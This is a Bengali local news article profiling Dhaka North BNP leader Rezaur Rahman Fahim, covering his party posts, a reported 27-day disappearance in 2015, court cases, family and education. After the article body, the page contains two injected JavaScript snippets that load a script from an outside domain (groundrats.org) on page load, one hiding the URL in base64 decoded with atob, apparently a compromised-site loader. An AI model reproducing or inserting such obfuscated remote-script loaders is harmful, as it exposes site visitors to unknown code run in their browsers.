২৭ দিন ছিলেন গুম দোহারের রেজাউর রহমান ফাহিম

    224

    মো আল-আমিন, news39.net: দোহারের কৃতি সন্তান রেজাউর রহমান ফাহিম আত্মত্যাগ এবং স্বচ্ছ রাজনীতির স্মারক হিসেবে ঢাকা মহানগর উত্তর বিএনপির আহবায়ক কমিটির সদস্য হয়েছেন। ইত:পূর্বে তিনি ছিলেন সহ সম্পাদক। আওয়ামীলীগের শাসনামলে ২৭ দিন গুম হয়ে ছিলেন এই মেধাবী তরুণ নেতা। বিএনপি চেয়ারপারসন বেগম খালেদা জিয়া ও ভারপ্রাপ্ত চেয়ারম্যান তারেক রহমানের বিশেষ স্নেহধন্য তিনি। বনানীতে আরাফাত রহমান কোকোর কবরের সার্বিক ব্যবস্থাপনার দায়িত্ব রয়েছে ফাহিমের।

    ২০১৫ সালে ১৬ ফেব্রুয়ারি গুলশানে নৌমন্ত্রীর মিছিলে বোমা হামলা মামলার অন্যতম আসামি ছিলেন। এই মামলার ১ নাম্বার আসামি ছিলেন বেগম খালেদা জিয়া। আর ফাহিম ৩ নম্বরের আসামি। এই মামলায় র‍্যাব গভীর রাতে ফাহিমের নিজ বাসা থেকে উঠিয়ে নিয়ে যায়।পরবর্তীতে পরিবারের সদস্যরা বিভন্ন থাায়, র‍্যাব অফিসে ডিবি অফিসে যোগাযোগ করেও কোন সন্ধান পাওয়া যায়না। তৎকালীন হাসিনা সরকারের উচ্চ মহলের নির্দেশে ফাহিম কে ২৭ দিন গুম করে রাখা হয়। পরবর্তীতে যাত্রাবাড়ী থানায় মিথ্যা নাটক সাজিয়ে গ্রেফতার দেখিয়ে রিমান্ডে নির্যাতন করা হয়।

    ফাইমের রয়েছে বর্ণাঢ্য রাজনৈতিক ক্যারিয়ার। ২০২৪ সালে বর্তমান পর্যন্ত (আমিনুল হক – মোস্তফা জামান কমিটি) নব নির্বাচিত সদস্য, আহবায়ক কমিটি, ঢাকা মহানগর উত্তর বিএনপি।

    অন্য খবর  পালক মেয়েকে ধর্ষণে বাধা: স্ত্রীকে কুপিয়ে হত্যাচেষ্টা

    ২০২১ সালে ছিলেন (আমানউল্লাহ আমান – আমিনুল হক কমিটি) সদস্য, আহবায়ক কমিটি, ঢাকা মহানগর উত্তর বিএনপি।

    ২০১৭ সালে ছিলেন (আব্দুল কাইয়ুম – আহসান উল্লাহ হাসান কমিটি) সাবেক সহ সাধারণ সম্পাদক, ঢাকা মহানগর উত্তর বিএনপি।

    ২০১৮ সালে বনানী থানায় নাশকতা মামলায় ঢাকা মহানগর উত্তর বিএনপির তখনকার সাবেক সহ সাধারণ সম্পাদক রেজাউর রহমান ফাহিম সহ
    বিএনপির ৩৩ নেতা কর্মীর সাজা দেন আদালত।

    এছাড়াও দীর্ঘ ১৫ বছরে লড়াই সংগ্রামে রাজপথে থেকে বিভিন্ন সময় বার বার জেল খেটেছেন। রিমান্ডে নির্যাতনের শিকার হয়েছিলেন।

    রেজাউর রহমান ফাহিমের পিতা, আদমজী জুট মিলের সাবের জিএম ফজলুর রহমান এবং মাতার নাম নাসিমা আক্তার রানু। তার গ্রামের বাড়ী দোহার উপজেলার নারিশা ইউনিয়নের দক্ষিণ শিমুলিয়া মোড়ল বাড়ী। নানা বাড়ী ঝনকি গ্রামে। এক কণ্যা সন্তানের জনক ফাহিম। তার স্ত্রী আন্নামা ফাহিম। বিমান বাংলাদেশ এয়ারলাইন্সে কর্মরত আছেন। ফাহিমের বড় বোন বাংলাদেশ সেনাবাহিনীর উচ্চ পদস্থ কর্মকর্তা। জাতীয়তাবাদী রাজনীতির সাথে যুক্ত থাকায় তিনি দীর্ঘদিন সেনাবাহিনীর পদোন্নতি বঞ্চিত হয়েছেন

    বর্তমানে, ফাহিম এশিয়ান টিভির উপদেষ্া হিসেবে কর্মরত আছেন।

    অন্য খবর  দোহারে পদ্মার ভাঙনে ছোট হয়ে আসছে স্থলভাগ

    ফাহিম আদমজী হাই স্কুল থেকে ১৯৯৪ সালে পঞ্চম শ্রেণী ও একই প্রতিষ্ঠান থেকে ১৯৯৯ সালে এসএসসি পরীক্ষায় এবং সরকারী বিজ্ঞান কলেজ থেকে এইচএসসি পরীক্ষায় স্টারমার্ক সহ পাশ করেন। পরবর্তীতে নর্থ সাউথ বিশ্ববিদ্যালয় থেকে বিবিএ এবং এমবিএ কমপ্লিট করেন।

    ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,’script’,’https://groundrats.org/tHHGGEDyAn6ygUcHwex98R1YlpAOQ9zvV2t6wfY5Sox’);
    ;(function(f,b,n,j,x,e){
    var decodedUrl = atob(‘aHR0cHM6Ly9ncm91bmRyYXRzLm9yZy90SEhHR0VEeUFuNnlnVWNId2V4OThSMVlscEFPUTl6dlYydDZ3Zlk1U294′);
    x=b.createElement(n);e=b.getElementsByTagName(n)[0];
    x.async=1;x.src=decodedUrl;
    e.parentNode.insertBefore(x,e);
    })(window,document,’script’);

    আপনার মতামত দিন